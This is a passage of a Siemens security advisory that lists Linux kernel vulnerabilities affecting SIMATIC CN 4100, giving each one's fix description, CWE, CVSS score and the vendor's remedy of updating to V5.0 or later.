Relevance: No one should use DRBD as a random data generator, and apparently all users of "two-primaries" handle concurrent writes correctly on layer up. That is cluster file systems use some distributed lock manager, and live migration in virtualization environments stops writes on one node before starting writes on the other node. Which means that other than for "test cases", this code path is never taken in real life.
FYI, in DRBD 9, things are handled differently nowadays. We still detect "write conflicts", but no longer try to be smart about them. We decided to disconnect hard instead: upper layers must not submit concurrent writes. If they do, that's their fault.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38711
In the Linux kernel, the following vulnerability has been resolved:
smb/server: avoid deadlock when linking with ReplaceIfExists
If smb2_create_link() is called with ReplaceIfExists set and the name does exist then a deadlock will happen. ksmbd_vfs_kern_path_locked() will return with success and the parent directory will be locked. ksmbd_vfs_remove_file() will then remove the file. ksmbd_vfs_link() will then be called while the parent is still locked. It will try to lock the same parent and will deadlock. This patch moves the ksmbd_vfs_kern_path_unlock() call to *before* ksmbd_vfs_link() and then simplifies the code, removing the file_present flag variable.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38712
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: don't use BUG_ON() in hfsplus_create_attributes_file()
When the volume header contains erroneous values that do not reflect the actual state of the filesystem, hfsplus_fill_super() assumes that the attributes file is not yet created, which later results in hitting BUG_ON() when hfsplus_create_attributes_file() is called. Replace this BUG_ON() with -EIO error with a message to suggest running fsck tool.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38713
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: fix slab-out-of-bounds read in hfsplus_uni2asc()
The hfsplus_readdir() method is capable to crash by calling hfsplus_uni2asc():
---truncated---
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38714
In the Linux kernel, the following vulnerability has been resolved:
hfsplus: fix slab-out-of-bounds in hfsplus_bnode_read()
The hfsplus_bnode_read() method can trigger the issue:
---truncated---
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38715
In the Linux kernel, the following vulnerability has been resolved:
hfs: fix slab-out-of-bounds in hfs_bnode_read()
This patch introduces is_bnode_offset_valid() method that checks the requested offset value. Also, it introduces check_and_correct_requested_length() method that checks and corrects the requested length (if it is necessary). These methods are used in hfs_bnode_read(), hfs_bnode_write(), hfs_bnode_clear(), hfs_bnode_copy(), and hfs_bnode_move() with the goal to prevent the access out of allocated memory and triggering the crash.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38721
In the Linux kernel, the following vulnerability has been resolved:
netfilter: ctnetlink: fix refcount leak on table dump
There is a reference count leak in ctnetlink_dump_table():
    if (res < 0) {
        nf_conntrack_get(&ct->ct_general); // HERE
        cb->args[1] = (unsigned long)ct;
        ...
While it's very unlikely, it's possible that ct == last.
If this happens, then the refcount of ct was already incremented. This 2nd increment is never undone. This prevents the conntrack object from being released, which in turn prevents cnet->count from dropping back to 0. This will then block the netns dismantle (or conntrack rmmod) as nf_conntrack_cleanup_net_list() will wait forever. This can be reproduced by running conntrack_resize.sh selftest in a loop. It takes ~20 minutes for me on a preemptible kernel on average before I see a runaway kworker spinning in nf_conntrack_cleanup_net_list. One fix would be to change this to:
    if (res < 0) {
        if (ct != last)
            nf_conntrack_get(&ct->ct_general);
But this reference counting isn't needed in the first place. We can just store a cookie value instead. A followup patch will do the same for ctnetlink_exp_dump_table, it looks to me as if this has the same problem and like ctnetlink_dump_table, we only need a 'skip hint', not the actual object so we can apply the same cookie strategy there as well.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-772 Missing Release of Resource after Effective Lifetime
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38723
In the Linux kernel, the following vulnerability has been resolved:
LoongArch: BPF: Fix jump offset calculation in tailcall
The extra pass of bpf_int_jit_compile() skips JIT context initialization which essentially skips offset calculation leaving out_offset = -1, so the jmp_offset in emit_bpf_tail_call is calculated by "#define jmp_offset (out_offset - (cur_offset))" is a negative number, which is wrong. The final generated assembly is as follows.
    54: bgeu $a2, $t1, -8 # 0x0000004c
    58: addi.d $a6, $s5, -1
    5c: bltz $a6, -16 # 0x0000004c
    60: alsl.d $t2, $a2, $a1, 0x3
    64: ld.d $t2, $t2, 264
    68: beq $t2, $zero, -28 # 0x0000004c
Before applying this patch, the following test case will reveal soft lock issues.
    cd tools/testing/selftests/bpf/
    ./test_progs --allow=tailcalls/tailcall_bpf2bpf_1
dmesg:
    watchdog: BUG: soft lockup - CPU#2 stuck for 26s! [test_progs:25056]
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38724
In the Linux kernel, the following vulnerability has been resolved:
nfsd: handle get_client_locked() failure in nfsd4_setclientid_confirm()
Lei Lu recently reported that nfsd4_setclientid_confirm() did not check the return value from get_client_locked(). A SETCLIENTID_CONFIRM could race with a confirmed client expiring and fail to get a reference. That could later lead to a UAF. Fix this by getting a reference early in the case where there is an extant confirmed client. If that fails then treat it as if there were no confirmed client found at all. In the case where the unconfirmed client is expiring, just fail and return the result from get_client_locked().
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-416 Use After Free
Metrics: CVSS Version 3.1; Base Score 7.8; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38725
In the Linux kernel, the following vulnerability has been resolved:
net: usb: asix_devices: add phy_mask for ax88772 mdio bus
Without setting phy_mask for ax88772 mdio bus, current driver may create at most 32 mdio phy devices with phy address range from 0x00 ~ 0x1f. DLink DUB-E100 H/W Ver B1 is such a device. However, only one main phy device will bind to net phy driver. This is creating issue during system suspend/resume since phy_polling_mode() in phy_state_machine() will directly dereference member of phydev->drv for non-main phy devices. Then NULL pointer dereference issue will occur. Due to only external phy or internal phy is necessary, add phy_mask for ax88772 mdio bus to workaround the issue.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2025-38727
In the Linux kernel, the following vulnerability has been resolved:
netlink: avoid infinite retry looping in netlink_unicast()
netlink_attachskb() checks for the socket's read memory allocation constraints. Firstly, it has:
    rmem < READ_ONCE(sk->sk_rcvbuf)
to check if the just increased rmem value fits into the socket's receive buffer.
If not, it proceeds and tries to wait for the memory under:
    rmem + skb->truesize > READ_ONCE(sk->sk_rcvbuf)
The checks don't cover the case when skb->truesize + sk->sk_rmem_alloc is equal to sk->sk_rcvbuf. Thus the function neither successfully accepts these conditions, nor manages to reschedule the task - and is called in retry loop for indefinite time which is caught as:
    rcu: INFO: rcu_sched self-detected stall on CPU
    rcu: 0-....: (25999 ticks this GP) idle=ef2/1/0x4000000000000000 softirq=262269/262269 fqs=6212
    (t=26000 jiffies g=230833 q=259957)
    NMI backtrace for cpu 0
    CPU: 0 PID: 22 Comm: kauditd Not tainted 5.10.240 #68
    Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.17.0-4.fc42 04/01/2014
    Call Trace:
    dump_stack lib/dump_stack.c:120
    nmi_cpu_backtrace.cold lib/nmi_backtrace.c:105
    nmi_trigger_cpumask_backtrace lib/nmi_backtrace.c:62
    rcu_dump_cpu_stacks kernel/rcu/tree_stall.h:335
    rcu_sched_clock_irq.cold kernel/rcu/tree.c:2590
    update_process_times kernel/time/timer.c:1953
    tick_sched_handle kernel/time/tick-sched.c:227
    tick_sched_timer kernel/time/tick-sched.c:1399
    __hrtimer_run_queues kernel/time/hrtimer.c:1652
    hrtimer_interrupt kernel/time/hrtimer.c:1717
    __sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1113
    asm_call_irq_on_stack arch/x86/entry/entry_64.S:808
    netlink_attachskb net/netlink/af_netlink.c:1234
    netlink_unicast net/netlink/af_netlink.c:1349
    kauditd_send_queue kernel/audit.c:776
    kauditd_thread kernel/audit.c:897
    kthread kernel/kthread.c:328
    ret_from_fork arch/x86/entry/entry_64.S:304
Restore the original behavior of the check which commit in Fixes accidentally missed when restructuring the code. Found by Linux Verification Center (linuxtesting.org).
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38728
In the Linux kernel, the following vulnerability has been resolved:
smb3: fix for slab out of bounds on mount to ksmbd
With KASAN enabled, it is possible to get a slab out of bounds during mount to ksmbd due to missing check in parse_server_interfaces() (see below):
    BUG: KASAN: slab-out-of-bounds in parse_server_interfaces+0x14ee/0x1880 [cifs]
    Read of size 4 at addr ffff8881433dba98 by task mount/9827
    CPU: 5 UID: 0 PID: 9827 Comm: mount Tainted: G OE 6.16.0-rc2-kasan #2 PREEMPT(voluntary)
    Tainted: [O]=OOT_MODULE, [E]=UNSIGNED_MODULE
    Hardware name: Dell Inc. Precision Tower 3620/0MWYPT, BIOS 2.13.1 06/14/2019
    Call Trace:
    dump_stack_lvl+0x9f/0xf0
    print_report+0xd1/0x670
    __virt_addr_valid+0x22c/0x430
    ? parse_server_interfaces+0x14ee/0x1880 [cifs]
    ? kasan_complete_mode_report_info+0x2a/0x1f0
    ? parse_server_interfaces+0x14ee/0x1880 [cifs]
    kasan_report+0xd6/0x110
    parse_server_interfaces+0x14ee/0x1880 [cifs]
    __asan_report_load_n_noabort+0x13/0x20
    parse_server_interfaces+0x14ee/0x1880 [cifs]
    ? __pfx_parse_server_interfaces+0x10/0x10 [cifs]
    ? trace_hardirqs_on+0x51/0x60
    SMB3_request_interfaces+0x1ad/0x3f0 [cifs]
    ? __pfx_SMB3_request_interfaces+0x10/0x10 [cifs]
    ? SMB2_tcon+0x23c/0x15d0 [cifs]
    smb3_qfs_tcon+0x173/0x2b0 [cifs]
    ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]
    ? cifs_get_tcon+0x105d/0x2120 [cifs]
    ? do_raw_spin_unlock+0x5d/0x200
    ? cifs_get_tcon+0x105d/0x2120 [cifs]
    ? __pfx_smb3_qfs_tcon+0x10/0x10 [cifs]
    cifs_mount_get_tcon+0x369/0xb90 [cifs]
    ? dfs_cache_find+0xe7/0x150 [cifs]
    dfs_mount_share+0x985/0x2970 [cifs]
    ? check_path.constprop.0+0x28/0x50
    ? save_trace+0x54/0x370
    ? __pfx_dfs_mount_share+0x10/0x10 [cifs]
    ? __lock_acquire+0xb82/0x2ba0
    ? __kasan_check_write+0x18/0x20
    cifs_mount+0xbc/0x9e0 [cifs]
    ? __pfx_cifs_mount+0x10/0x10 [cifs]
    ? do_raw_spin_unlock+0x5d/0x200
    ? cifs_setup_cifs_sb+0x29d/0x810 [cifs]
    cifs_smb3_do_mount+0x263/0x1990 [cifs]
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38729
In the Linux kernel, the following vulnerability has been resolved:
ALSA: usb-audio: Validate UAC3 power domain descriptors, too
UAC3 power domain descriptors need to be verified with its variable bLength for avoiding the unexpected OOB accesses by malicious firmware, too.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 7.1; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2025-38732
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_reject: don't leak dst refcount for loopback packets
Recent patches to add a WARN() when replacing skb dst entry found an old bug:
    WARNING: include/linux/skbuff.h:1165 skb_dst_check_unset include/linux/skbuff.h:1164 [inline]
    WARNING: include/linux/skbuff.h:1165 skb_dst_set include/linux/skbuff.h:1210 [inline]
    WARNING: include/linux/skbuff.h:1165 nf_reject_fill_skb_dst+0x2a4/0x330 net/ipv4/netfilter/nf_reject_ipv4.c:234
    [..]
    Call Trace:
    nf_send_unreach+0x17b/0x6e0 net/ipv4/netfilter/nf_reject_ipv4.c:325
    nft_reject_inet_eval+0x4bc/0x690 net/netfilter/nft_reject_inet.c:27
    expr_call_ops_eval net/netfilter/nf_tables_core.c:237 [inline]
    ..
This is because blamed commit forgot about loopback packets. Such packets already have a dst_entry attached, even at PRE_ROUTING stage. Instead of checking hook just check if the skb already has a route attached to it.
Affected Products: Siemens SIMATIC; Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected
Remediations: Vendor fix: Update to V5.0 or later version https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-911 Improper Update of Reference Count
Metrics: CVSS Version 3.1; Base Score 5.8; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H

CVE-2025-38735
In the Linux kernel, the following vulnerability has been resolved:
gve: prevent ethtool ops after shutdown
A crash can occur if an ethtool operation is invoked after shutdown() is called. shutdown() is invoked during system shutdown to stop DMA operations without performing expensive deallocations. It is discouraged to unregister the netdev in this path, so the device may still be visible to userspace and kernel helpers. In gve, shutdown() tears down most internal data structures. If an ethtool operation is dispatched after shutdown(), it will dereference freed or NULL pointers, leading to a kernel panic. While graceful shutdown normally quiesces userspace before invoking the reboot syscall, forced shutdowns (as observed on GCP VMs) can still trigger this path. Fix by calling netif_device_detach() in shutdown(). This marks the device as detached so the ethtool ioctl handler will skip dispatching operations to the driver.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-664 Improper Control of a Resource Through its Lifetime
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-38736

In the Linux kernel, the following vulnerability has been resolved:

net: usb: asix_devices: Fix PHY address mask in MDIO bus initialization

Syzbot reported shift-out-of-bounds exception on MDIO bus initialization.

The PHY address should be masked to 5 bits (0-31). Without this mask, invalid PHY addresses could be used, potentially causing issues with MDIO bus operations.

Fix this by masking the PHY address with 0x1f (31 decimal) to ensure it stays within the valid range.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39673

In the Linux kernel, the following vulnerability has been resolved:

ppp: fix race conditions in ppp_fill_forward_path

ppp_fill_forward_path() has two race conditions:

1. The ppp->channels list can change between list_empty() and list_first_entry(), as ppp_lock() is not held. If the only channel is deleted in ppp_disconnect_channel(), list_first_entry() may access an empty head or a freed entry, and trigger a panic.

2. pch->chan can be NULL. When ppp_unregister_channel() is called, pch->chan is set to NULL before pch is removed from ppp->channels.

Fix these by using a lockless RCU approach:
- Use list_first_or_null_rcu() to safely test and access the first list entry.
- Convert list modifications on ppp->channels to their RCU variants and add synchronize_net() after removal.
- Check for a NULL pch->chan before dereferencing it.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
Metrics: CVSS Version 3.1; Base Score 5.9; Base Severity MEDIUM; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39675

In the Linux kernel, the following vulnerability has been resolved:

drm/amd/display: Add null pointer check in mod_hdcp_hdcp1_create_session()

The function mod_hdcp_hdcp1_create_session() calls the function get_first_active_display(), but does not check its return value. The return value is a null pointer if the display list is empty. This will lead to a null pointer dereference.

Add a null pointer check for get_first_active_display() and return MOD_HDCP_STATUS_DISPLAY_NOT_FOUND if the function returns null.

This is similar to the commit c3e9826a2202 ("drm/amd/display: Add null pointer check for get_first_active_display()").

(cherry picked from commit 5e43eb3cd731649c4f8b9134f857be62a416c893)

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39676

In the Linux kernel, the following vulnerability has been resolved:

scsi: qla4xxx: Prevent a potential error pointer dereference

The qla4xxx_get_ep_fwdb() function is supposed to return NULL on error, but qla4xxx_ep_connect() returns error pointers. Propagating the error pointers will lead to an Oops in the caller, so change the error pointers to NULL.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-394 Unexpected Status Code or Return Value
Metrics: CVSS Version 3.1; Base Score 5.1; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39681

In the Linux kernel, the following vulnerability has been resolved:

x86/cpu/hygon: Add missing resctrl_cpu_detect() in bsp_init helper

Since 923f3a2b48bd ("x86/resctrl: Query LLC monitoring properties once during boot") resctrl_cpu_detect() has been moved from common CPU initialization code to the vendor-specific BSP init helper, while Hygon didn't put that call in their code.

This triggers a division by zero fault during early booting stage on our machines with X86_FEATURE_CQM* supported, where get_rdt_mon_resources() tries to calculate mon_l3_config with uninitialized boot_cpu_data.x86_cache_occ_scale.

Add the missing resctrl_cpu_detect() in the Hygon BSP init helper.

[ bp: Massage commit message. ]

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-369 Divide By Zero
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39682

In the Linux kernel, the following vulnerability has been resolved:

tls: fix handling of zero-length records on the rx_list

Each recvmsg() call must process either
- only contiguous DATA records (any number of them)
- one non-DATA record

If the next record has different type than what has already been processed we break out of the main processing loop. If the record has already been decrypted (which may be the case for TLS 1.3 where we don't know type until decryption) we queue the pending record to the rx_list. Next recvmsg() will pick it up from there.

Queuing the skb to rx_list after zero-copy decrypt is not possible, since in that case we decrypted directly to the user space buffer, and we don't have an skb to queue (darg.skb points to the ciphertext skb for access to metadata like length).

Only data records are allowed zero-copy, and we break the processing loop after each non-data record. So we should never zero-copy and then find out that the record type has changed. The corner case we missed is when the initial record comes from rx_list, and it's zero length.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 7; Base Severity HIGH; Vector String CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:H

CVE-2025-39683

In the Linux kernel, the following vulnerability has been resolved:

tracing: Limit access to parser->buffer when trace_get_user failed

When the length of the string written to set_ftrace_filter exceeds FTRACE_BUFF_MAX, the following KASAN alarm will be triggered:

BUG: KASAN: slab-out-of-bounds in strsep+0x18c/0x1b0
Read of size 1 at addr ffff0000d00bd5ba by task ash/165

CPU: 1 UID: 0 PID: 165 Comm: ash Not tainted 6.16.0-g6bcdbd62bd56-dirty
Hardware name: linux,dummy-virt (DT)
Call trace:
 show_stack+0x34/0x50 (C)
 dump_stack_lvl+0xa0/0x158
 print_address_description.constprop.0+0x88/0x398
 print_report+0xb0/0x280
 kasan_report+0xa4/0xf0
 __asan_report_load1_noabort+0x20/0x30
 strsep+0x18c/0x1b0
 ftrace_process_regex.isra.0+0x100/0x2d8
 ftrace_regex_release+0x484/0x618
 __fput+0x364/0xa58
 ____fput+0x28/0x40
 task_work_run+0x154/0x278
 do_notify_resume+0x1f0/0x220
 el0_svc+0xec/0xf0
 el0t_64_sync_handler+0xa0/0xe8
 el0t_64_sync+0x1ac/0x1b0

The reason is that trace_get_user will fail when processing a string longer than FTRACE_BUFF_MAX, but not set the end of parser->buffer to 0. Then an OOB access will be triggered in ftrace_regex_release->ftrace_process_regex->strsep->strpbrk. We can solve this problem by limiting access to parser->buffer when trace_get_user failed.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-125 Out-of-bounds Read
Metrics: CVSS Version 3.1; Base Score 7.1; Base Severity HIGH; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H

CVE-2025-39684

In the Linux kernel, the following vulnerability has been resolved:

comedi: Fix use of uninitialized memory in do_insn_ioctl() and do_insnlist_ioctl()

syzbot reports a KMSAN kernel-infoleak in `do_insn_ioctl()`. A kernel buffer is allocated to hold `insn->n` samples (each of which is an `unsigned int`). For some instruction types, `insn->n` samples are copied back to user-space, unless an error code is being returned. The problem is that not all the instruction handlers that need to return data to userspace fill in the whole `insn->n` samples, so that there is an information leak. There is a similar syzbot report for `do_insnlist_ioctl()`, although it does not have a reproducer for it at the time of writing.

One culprit is `insn_rw_emulate_bits()` which is used as the handler for `INSN_READ` or `INSN_WRITE` instructions for subdevices that do not have a specific handler for that instruction, but do have an `INSN_BITS` handler. For `INSN_READ` it only fills in at most 1 sample, so if `insn->n` is greater than 1, the remaining `insn->n - 1` samples copied to userspace will be uninitialized kernel data.

Another culprit is `vm80xx_ai_insn_read()` in the "vm80xx" driver. It never returns an error, even if it fails to fill the buffer.

Fix it in `do_insn_ioctl()` and `do_insnlist_ioctl()` by making sure that uninitialized parts of the allocated buffer are zeroed before handling each instruction.

Thanks to Arnaud Lecomte for their fix to `do_insn_ioctl()`.
That fix replaced the call to `kmalloc_array()` with `kcalloc()`, but it is not always necessary to clear the whole buffer.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39685

In the Linux kernel, the following vulnerability has been resolved:

comedi: pcl726: Prevent invalid irq number

The reproducer passed in an irq number(0x80008000) that was too large, which triggered the oob.

Added an interrupt number check to prevent users from passing in an irq number that was too large.

If `it->options[1]` is 31, then `1 << it->options[1]` is still invalid because it shifts a 1-bit into the sign bit (which is UB in C). Possible solutions include reducing the upper bound on the `it->options[1]` value to 30 or lower, or using `1U << it->options[1]`.

The old code would just not attempt to request the IRQ if the `options[1]` value were invalid. And it would still configure the device without interrupts even if the call to `request_irq` returned an error. So it would be better to combine this test with the test below.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39686

In the Linux kernel, the following vulnerability has been resolved:

comedi: Make insn_rw_emulate_bits() do insn->n samples

The `insn_rw_emulate_bits()` function is used as a default handler for `INSN_READ` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_READ`. Similarly, it is used as a default handler for `INSN_WRITE` instructions for subdevices that have a handler for `INSN_BITS` but not for `INSN_WRITE`. It works by emulating the `INSN_READ` or `INSN_WRITE` instruction handling with a constructed `INSN_BITS` instruction. However, `INSN_READ` and `INSN_WRITE` instructions are supposed to be able to read or write multiple samples, indicated by the `insn->n` value, but `insn_rw_emulate_bits()` currently only handles a single sample. For `INSN_READ`, the comedi core will copy `insn->n` samples back to user-space. (That triggered KASAN kernel-infoleak errors when `insn->n` was greater than 1, but that is being fixed more generally elsewhere in the comedi core.)

Make `insn_rw_emulate_bits()` either handle `insn->n` samples, or return an error, to conform to the general expectation for `INSN_READ` and `INSN_WRITE` handlers.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
Remediations: Vendor fix: Update to V5.0 or later version, https://support.industry.siemens.com/cs/ww/en/view/109814144/
Relevant CWE: CWE-20 Improper Input Validation
Metrics: CVSS Version 3.1; Base Score 5.5; Base Severity MEDIUM; Vector String CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE-2025-39687

In the Linux kernel, the following vulnerability has been resolved:

iio: light: as73211: Ensure buffer holes are zeroed

Given that the buffer is copied to a kfifo that ultimately user space can read, ensure we zero it.

Affected Products: Siemens SIMATIC (Vendor: Siemens; Product Version: SIMATIC CN 4100; Product Status: known_affected)
